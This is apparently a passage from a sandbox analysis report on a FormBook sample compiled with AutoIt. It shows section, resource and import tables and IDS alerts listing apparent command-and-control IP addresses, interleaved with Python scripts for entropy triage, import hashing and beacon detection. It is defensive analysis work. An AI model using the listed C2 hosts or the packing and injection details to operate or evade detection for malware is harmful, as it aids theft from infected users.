                                             IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x106000        | 0x7134       | .reloc
                                             IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x92bc0         | 0x1c         | .rdata
                                             IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
                                             IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
                                             IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
                                             IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0xa4b50         | 0x40         | .rdata
                                             IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
                                             IMAGE_DIRECTORY_ENTRY_IAT            | 0x8f000         | 0x884        | .rdata
                                             IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
                                             IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
                                             IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
                                             Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity     | File Type | Entropy            | Characteristics
                                             .text  | 0x1000          | 0x8dfdd      | 0x8e000  | 310e36668512d53489c005622bb1b4a9 | False    | 0.5735602580325704  | data      | 6.675248351711057  | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                             .rdata | 0x8f000         | 0x2fd8e      | 0x2fe00  | 748cf1ab2605ce1fd72d53d912abb68f | False    | 0.32828818537859006 | data      | 5.763244005758284  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                             .data  | 0xbf000         | 0x8f74       | 0x5200   | aae9601d920f07080bdfadf43dfeff12 | False    | 0.1017530487804878  | data      | 1.1963819235530628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                             .rsrc  | 0xc8000         | 0x3db5c      | 0x3dc00  | a329608b79246d69381ac2e6cc327474 | False    | 0.8937760943825911  | data      | 7.810519453142418  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                             .reloc | 0x106000        | 0x7134       | 0x7200   | f04128ad0f87f42830e4a6cdbc38c719 | False    | 0.7617530153508771  | data      | 6.783955557128661  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                             Name          | RVA      | Size    | Type                                                                                | Language | Country       | ZLIB Complexity
                                             RT_ICON       | 0xc85a8  | 0x128   | Device independent bitmap graphic, 16 x 32 x 4, image size 192                      | English  | Great Britain | 0.7466216216216216
                                             RT_ICON       | 0xc86d0  | 0x128   | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English  | Great Britain | 0.3277027027027027
                                             RT_ICON       | 0xc87f8  | 0x128   | Device independent bitmap graphic, 16 x 32 x 4, image size 192                      | English  | Great Britain | 0.3885135135135135
                                             RT_ICON       | 0xc8920  | 0x2e8   | Device independent bitmap graphic, 32 x 64 x 4, image size 0                        | English  | Great Britain | 0.3333333333333333
                                             RT_ICON       | 0xc8c08  | 0x128   | Device independent bitmap graphic, 16 x 32 x 4, image size 0                        | English  | Great Britain | 0.5
                                             RT_ICON       | 0xc8d30  | 0xea8   | Device independent bitmap graphic, 48 x 96 x 8, image size 0                        | English  | Great Britain | 0.2835820895522388
                                             RT_ICON       | 0xc9bd8  | 0x8a8   | Device independent bitmap graphic, 32 x 64 x 8, image size 0                        | English  | Great Britain | 0.37906137184115524
                                             RT_ICON       | 0xca480  | 0x568   | Device independent bitmap graphic, 16 x 32 x 8, image size 0                        | English  | Great Britain | 0.23699421965317918
                                             RT_ICON       | 0xca9e8  | 0x25a8  | Device independent bitmap graphic, 48 x 96 x 32, image size 0                       | English  | Great Britain | 0.13858921161825727
                                             RT_ICON       | 0xccf90  | 0x10a8  | Device independent bitmap graphic, 32 x 64 x 32, image size 0                       | English  | Great Britain | 0.25070356472795496
                                             RT_ICON       | 0xce038  | 0x468   | Device independent bitmap graphic, 16 x 32 x 32, image size 0                       | English  | Great Britain | 0.3173758865248227
                                             RT_MENU       | 0xce4a0  | 0x50    | data                                                                                | English  | Great Britain | 0.9
                                             RT_STRING     | 0xce4f0  | 0x594   | data                                                                                | English  | Great Britain | 0.3333333333333333
                                             RT_STRING     | 0xcea84  | 0x68a   | data                                                                                | English  | Great Britain | 0.2747909199522103
                                             RT_STRING     | 0xcf110  | 0x490   | data                                                                                | English  | Great Britain | 0.3715753424657534
                                             RT_STRING     | 0xcf5a0  | 0x5fc   | data                                                                                | English  | Great Britain | 0.3087467362924282
                                             RT_STRING     | 0xcfb9c  | 0x65c   | data                                                                                | English  | Great Britain | 0.34336609336609336
                                             RT_STRING     | 0xd01f8  | 0x466   | data                                                                                | English  | Great Britain | 0.3605683836589698
                                             RT_STRING     | 0xd0660  | 0x158   | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0                    | English  | Great Britain | 0.502906976744186
                                             RT_RCDATA     | 0xd07b8  | 0x34e22 | data                                                                                |          |               | 1.0003508609944138
                                             RT_GROUP_ICON | 0x1055dc | 0x76    | data                                                                                | English  | Great Britain | 0.6610169491525424
                                             RT_GROUP_ICON | 0x105654 | 0x14    | data                                                                                | English  | Great Britain | 1.25
                                             RT_GROUP_ICON | 0x105668 | 0x14    | data                                                                                | English  | Great Britain | 1.15
                                             RT_GROUP_ICON | 0x10567c | 0x14    | data                                                                                | English  | Great Britain | 1.25
                                             RT_VERSION    | 0x105690 | 0xdc    | data                                                                                | English  | Great Britain | 0.6181818181818182
                                             RT_MANIFEST   | 0x10576c | 0x3ef   | ASCII text, with CRLF line terminators                                              | English  | Great Britain | 0.5074478649453823
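The Entropy and ZLIB Complexity columns are the quickest packed-payload indicator in the two tables above: .rsrc sits at 7.81 bits per byte while the code section is at 6.68, and the single RT_RCDATA resource at 0xd07b8 (0x34e22 bytes, the bulk of the section) has a ZLIB complexity of 1.0003, meaning it does not compress at all. RCDATA is where a compiled AutoIt executable carries its script, and an incompressible blob of that size is what an already-encrypted embedded stage looks like; that is consistent with the FormBook verdict but only extracting the resource confirms it. The script below is an added example, not part of the Joe Sandbox report and not code from the sample: it builds a small synthetic PE32 in memory (constructed here; the layout, section names and the 7.3 threshold are the example's own assumptions), parses the section headers into the same fields the section table shows, and flags sections whose entropy is near the 8-bit ceiling or that are both writable and executable.

```python
"""Section-level entropy triage for a PE32 image (added example, synthetic PE)."""
import hashlib
import math
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """DOS header -> PE signature -> COFF header -> section headers.
    Returns one dict per section with the fields the report tabulates."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsec, _ts, _symp, _nsym, opt_size, _chars = struct.unpack_from("<HHIIIHH", pe, coff)
    opt = coff + 20
    if struct.unpack_from("<H", pe, opt)[0] != 0x10B:
        raise ValueError("only PE32 (optional header magic 0x10b) is handled here")
    sec_tbl = opt + opt_size
    sections = []
    for i in range(nsec):
        name, vsize, va, raw_size, raw_ptr, _r, _l, _nr, _nl, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, sec_tbl + 40 * i)
        raw = pe[raw_ptr:raw_ptr + raw_size]          # bytes as stored on disk
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "raw_size": raw_size,
            "md5": hashlib.md5(raw).hexdigest(),
            "entropy": shannon_entropy(raw),
            "exec": bool(chars & IMAGE_SCN_MEM_EXECUTE),
            "write": bool(chars & IMAGE_SCN_MEM_WRITE),
        })
    return sections


def triage(sections: list, threshold: float = 7.3) -> list:
    """Names of sections worth unpacking: entropy near 8 means compressed or
    encrypted content; writable+executable is a self-modifying-code hint."""
    return [s["name"] for s in sections
            if s["entropy"] >= threshold or (s["exec"] and s["write"])]


def _pseudo_random(n: int, seed: bytes = b"rsrc") -> bytes:
    """Deterministic high-entropy filler (SHA-256 chain) standing in for an encrypted blob."""
    out, h = bytearray(), seed
    while len(out) < n:
        h = hashlib.sha256(h).digest()
        out += h
    return bytes(out[:n])


def build_sample_pe() -> bytes:
    """Constructed PE32: a low-entropy .text and a high-entropy .rsrc.
    Optional-header fields the parser never reads are left zero."""
    dos = b"MZ" + bytes(58) + struct.pack("<I", 0x40)                   # e_lfanew = 0x40
    opt = struct.pack("<H", 0x10B).ljust(92, b"\0") + struct.pack("<I", 16) + bytes(128)
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, len(opt), 0x0102)  # i386, 2 sections
    text = bytes(range(16)) * 32                                          # 0x200 bytes, entropy 4.0
    rsrc = _pseudo_random(0x1000)                                         # 0x1000 bytes, entropy ~7.95
    sec_hdrs = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x1000, len(text), 0x200, 0, 0, 0, 0,
                           IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    sec_hdrs += struct.pack("<8sIIIIIIHHI", b".rsrc", len(rsrc), 0x2000, len(rsrc), 0x400, 0, 0, 0, 0,
                            IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ)
    headers = (dos + b"PE\0\0" + coff + opt + sec_hdrs).ljust(0x200, b"\0")
    return headers + text + rsrc


if __name__ == "__main__":
    secs = parse_sections(build_sample_pe())
    for s in secs:
        print(f'{s["name"]:<8} va=0x{s["va"]:x} raw=0x{s["raw_size"]:x} '
              f'entropy={s["entropy"]:.3f} md5={s["md5"]}')
    print("triage:", triage(secs))
```

Run against a real file, read the bytes and pass them to parse_sections; the entropy of a section is a property of its raw bytes, so a value above the threshold in a section that is not code is the same signal the report encodes in its Entropy column.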
                                             DLL: Imports
                                             WSOCK32.dll: WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                             VERSION.dll: GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                             WINMM.dll: timeGetTime, waveOutSetVolume, mciSendStringW
                                             COMCTL32.dll: ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                             MPR.dll: WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                             WININET.dll: InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                             PSAPI.DLL: GetProcessMemoryInfo
                                             IPHLPAPI.DLL: IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                             USERENV.dll: DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                             UxTheme.dll: IsThemeActive
                                             KERNEL32.dll: DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                             USER32.dll: AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                             GDI32.dll: StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                             COMDLG32.dll: GetOpenFileNameW, GetSaveFileNameW
                                             ADVAPI32.dll: GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                             SHELL32.dll: DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                             ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                             OLEAUT32.dll: LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
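The import table above describes the interpreter, not the script. A compiled AutoIt executable is the AutoIt3 runtime with the script stored as a resource, and the runtime links every API its built-in functions need, whether or not the script ever calls them: BlockInput, mouse_event and keybd_event, WNetAddConnection2W, waveOutSetVolume and mciSendStringW, IcmpSendEcho, CreateProcessWithLogonW and LogonUserW, and also VirtualAllocEx, WriteProcessMemory and ReadProcessMemory, which AutoIt uses to read controls in other processes. The Import Hash afcdf79be1557326c854b6e20cb900a7 in the static information above is accordingly the value shared by AutoIt3-compiled executables in general; it identifies the runtime, not this FormBook loader, and the injection calls the script actually makes go through DllCall at run time and never show up in this table. Two of the dropped-file previews further up begin with EA06, the chunk tag of AutoIt's compiled-script container (the AU3!EA06 signature), which is a consistent sign, though only a parser for that format settles it. The script below is an added example, not the report's or AutoIt's code: it computes an import hash the way pefile does (lower-cased dll.function pairs in table order, .dll/.ocx/.sys extensions stripped, ordinals as ordN, MD5; pefile's ordinal-to-name lookup tables are left out, which is a simplification) and scores how much of the AutoIt runtime fingerprint is present. The import list is transcribed from the table above but trimmed to the entries the check needs, so the hash it yields is not the sample's; the fingerprint set and the threshold of eight hits are the example's own assumptions.

```python
"""Import hash (pefile-style) and AutoIt3 runtime fingerprint over an import list (added example)."""
import hashlib

# Transcribed from the report's import table, trimmed to what the checks use.
# Order within each DLL is kept as printed because imphash is order-sensitive.
SAMPLE_IMPORTS = [
    ("WSOCK32.dll", ["WSACleanup", "socket", "inet_ntoa", "setsockopt", "ntohs", "recvfrom",
                     "ioctlsocket", "htons", "WSAStartup", "__WSAFDIsSet", "select", "accept",
                     "listen", "bind", "closesocket", "WSAGetLastError", "recv", "sendto", "send",
                     "inet_addr", "gethostbyname", "gethostname", "connect"]),
    ("WINMM.dll", ["timeGetTime", "waveOutSetVolume", "mciSendStringW"]),
    ("MPR.dll", ["WNetUseConnectionW", "WNetCancelConnection2W", "WNetGetConnectionW",
                 "WNetAddConnection2W"]),
    ("IPHLPAPI.DLL", ["IcmpCreateFile", "IcmpCloseHandle", "IcmpSendEcho"]),
    ("KERNEL32.dll", ["VirtualAllocEx", "WriteProcessMemory", "ReadProcessMemory", "OpenProcess",
                      "CreateProcessW", "ResumeThread", "IsDebuggerPresent", "SetSystemPowerState"]),
    ("USER32.dll", ["BlockInput", "mouse_event", "keybd_event", "SendInput", "ExitWindowsEx",
                    "GetAsyncKeyState", "SetKeyboardState"]),
    ("ADVAPI32.dll", ["CreateProcessWithLogonW", "LogonUserW", "InitiateSystemShutdownExW"]),
]


def normalize_imports(imports) -> str:
    """pefile-style normalisation: lower-case, strip only .dll/.ocx/.sys,
    integer entries are ordinals and become ordN, order exactly as given."""
    parts = []
    for dll, funcs in imports:
        lib = dll.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if lib.endswith(ext):
                lib = lib[:-len(ext)]
                break
        for f in funcs:
            name = f"ord{f}" if isinstance(f, int) else f.lower()
            parts.append(f"{lib}.{name}")
    return ",".join(parts)


def imphash(imports) -> str:
    """MD5 over the normalised, comma-joined import string."""
    return hashlib.md5(normalize_imports(imports).encode("ascii")).hexdigest()


# APIs behind AutoIt3 built-ins (BlockInput(), MouseClick()/Send(), DriveMapAdd(),
# SoundSetWaveVolume()/SoundPlay(), Ping(), Shutdown(), RunAs()).  Seeing most of
# them together fingerprints the runtime regardless of what the script does.
# (Assumed fingerprint set for this example.)
AUTOIT_RUNTIME_APIS = {
    "BlockInput", "mouse_event", "keybd_event", "WNetAddConnection2W", "WNetUseConnectionW",
    "waveOutSetVolume", "mciSendStringW", "IcmpSendEcho", "SetSystemPowerState",
    "ExitWindowsEx", "CreateProcessWithLogonW", "LogonUserW",
}


def autoit_runtime_indicators(imports, min_hits: int = 8) -> dict:
    """Which fingerprint APIs are imported, and whether enough of them are present
    to treat the import table as the interpreter's rather than the payload's."""
    present = {f for _, funcs in imports for f in funcs if isinstance(f, str)}
    hits = sorted(present & AUTOIT_RUNTIME_APIS)
    return {"hits": hits, "likely_autoit_runtime": len(hits) >= min_hits}


if __name__ == "__main__":
    print("normalised:", normalize_imports(SAMPLE_IMPORTS)[:80], "...")
    print("imphash   :", imphash(SAMPLE_IMPORTS))
    print("autoit    :", autoit_runtime_indicators(SAMPLE_IMPORTS))
```

When the runtime fingerprint matches, stop reading the import table for intent and move to the script: the behaviour that matters (process hollowing, thread injection, the APC queueing listed in the signatures at the top) is in the decompiled AutoIt script and in the dropped, encrypted stages, not in what the interpreter links.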
                                             Language of compilation system: English
                                             Country where language is spoken: Great Britain
                                             Timestamp                | Protocol | SID     | Message                              | Source Port | Dest Port | Source IP   | Dest IP
                                             07/03/24-17:27:15.447591 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49715       | 80        | 192.168.2.9 | 185.53.179.91
                                             07/03/24-17:28:17.173810 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49717       | 80        | 192.168.2.9 | 104.194.9.178
                                             07/03/24-17:26:54.930423 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49714       | 80        | 192.168.2.9 | 3.64.163.50
                                             07/03/24-17:29:39.440629 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49720       | 80        | 192.168.2.9 | 188.114.96.3
                                             07/03/24-17:26:15.356501 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49711       | 80        | 192.168.2.9 | 76.223.105.230
                                             07/03/24-17:28:37.873542 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49718       | 80        | 192.168.2.9 | 89.106.200.1
                                             07/03/24-17:25:55.097431 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49709       | 80        | 192.168.2.9 | 188.114.97.3
                                             07/03/24-17:27:36.550599 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49716       | 80        | 192.168.2.9 | 194.41.37.158
                                             07/03/24-17:29:18.833017 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49719       | 80        | 192.168.2.9 | 65.21.196.90
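Nine alerts with the same SID, each to a different destination, all on port 80, spaced about 20 or 40 seconds apart: FormBook walks the domain list in its configuration (the C2 URLs the signatures at the top say were recovered), and a good share of those hosts are decoys, so the durable detection is the pattern rather than any one IP, and an IP blocklist built from this table would also block legitimate hosts. The script below is an added example, not Joe Sandbox or Emerging Threats logic: it takes the nine alert rows transcribed from the table above, sorts them, checks whether the gaps are integer multiples of one base period (a sleep loop that occasionally skips a beat, for instance on a host that does not answer) and whether every connection goes to a fresh host on the same port. The 15% tolerance and the minimum of five distinct hosts are the example's own assumptions; the negative case in the test is constructed.

```python
"""Cadence and fan-out check over Snort-style alert rows (added example)."""
from datetime import datetime
from statistics import median

# (timestamp, src_ip, src_port, dst_ip, dst_port) transcribed from the alert table above.
ALERTS = [
    ("07/03/24-17:27:15.447591", "192.168.2.9", 49715, "185.53.179.91", 80),
    ("07/03/24-17:28:17.173810", "192.168.2.9", 49717, "104.194.9.178", 80),
    ("07/03/24-17:26:54.930423", "192.168.2.9", 49714, "3.64.163.50", 80),
    ("07/03/24-17:29:39.440629", "192.168.2.9", 49720, "188.114.96.3", 80),
    ("07/03/24-17:26:15.356501", "192.168.2.9", 49711, "76.223.105.230", 80),
    ("07/03/24-17:28:37.873542", "192.168.2.9", 49718, "89.106.200.1", 80),
    ("07/03/24-17:25:55.097431", "192.168.2.9", 49709, "188.114.97.3", 80),
    ("07/03/24-17:27:36.550599", "192.168.2.9", 49716, "194.41.37.158", 80),
    ("07/03/24-17:29:18.833017", "192.168.2.9", 49719, "65.21.196.90", 80),
]


def parse_ts(s: str) -> datetime:
    """Snort fast-log timestamp, month/day/year-time.microseconds."""
    return datetime.strptime(s, "%m/%d/%y-%H:%M:%S.%f")


def analyse_source(events, src: str, tolerance: float = 0.15, min_hosts: int = 5) -> dict:
    """Sort one source's outbound events and test two things: do the gaps sit on
    integer multiples of a single base period (assumed: tolerance relative to that
    period), and does each event go to a host not seen before on the same port?"""
    mine = sorted((parse_ts(t), d, dp) for t, s, _, d, dp in events if s == src)
    times = [t for t, _, _ in mine]
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if not gaps:
        return {"src": src, "events": len(mine), "periodic": False, "beacon_walk": False}
    base = min(gaps)
    periodic = all(abs(g - round(g / base) * base) <= tolerance * base for g in gaps)
    distinct_hosts = {d for _, d, _ in mine}
    ports = {dp for _, _, dp in mine}
    return {
        "src": src,
        "events": len(mine),
        "distinct_dst": len(distinct_hosts),
        "dst_ports": sorted(ports),
        "base_period_s": round(base, 2),
        "median_gap_s": round(median(gaps), 2),
        "periodic": periodic,
        # fixed cadence + a new host every time + one port: a bot walking a server list
        "beacon_walk": periodic and len(ports) == 1
                       and len(distinct_hosts) == len(mine) and len(mine) >= min_hosts,
    }


def flagged_sources(events, **kw) -> list:
    """Every source whose traffic matches the walk pattern."""
    sources = sorted({s for _, s, _, _, _ in events})
    return [r for r in (analyse_source(events, s, **kw) for s in sources) if r["beacon_walk"]]


if __name__ == "__main__":
    for r in flagged_sources(ALERTS):
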